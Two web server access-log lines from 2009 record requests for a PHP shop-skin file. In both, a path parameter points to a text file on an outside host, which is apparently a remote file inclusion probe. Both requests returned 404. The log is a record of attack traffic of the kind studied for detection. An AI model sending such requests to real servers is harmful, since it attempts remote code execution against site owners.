114.4.8.14 - - [02/Nov/2009:02:09:07 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
114.4.8.14 - - [02/Nov/2009:02:09:07 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
